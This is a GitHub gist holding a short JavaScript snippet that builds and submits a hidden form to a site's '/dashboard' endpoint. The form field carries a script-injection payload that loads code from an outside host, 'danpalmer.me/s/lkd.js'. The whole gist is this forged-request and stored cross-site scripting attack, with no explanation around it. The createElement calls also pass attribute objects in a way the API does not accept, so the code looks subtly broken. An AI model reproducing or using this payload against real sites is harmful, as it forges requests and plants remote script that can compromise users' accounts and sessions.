Skip to content

Instantly share code, notes, and snippets.

@danpalmer
Created August 19, 2012 22:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save danpalmer/3398273 to your computer and use it in GitHub Desktop.
Save danpalmer/3398273 to your computer and use it in GitHub Desktop.
var form = document.createElement("form", {action: "/dashboard", method: "POST", style: "display: none", onsubmit: "return false;"});
form.appendChild(document.createElement("input", {type: "hidden", name: "21", value: "<IMG \"\"\"><SCRIPT SRC=\"//danpalmer.me/s/lkd.js\"></SCRIPT>\">"}));
document.body.appendChild(form);
form.submit();
document.body.removeChild(form);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment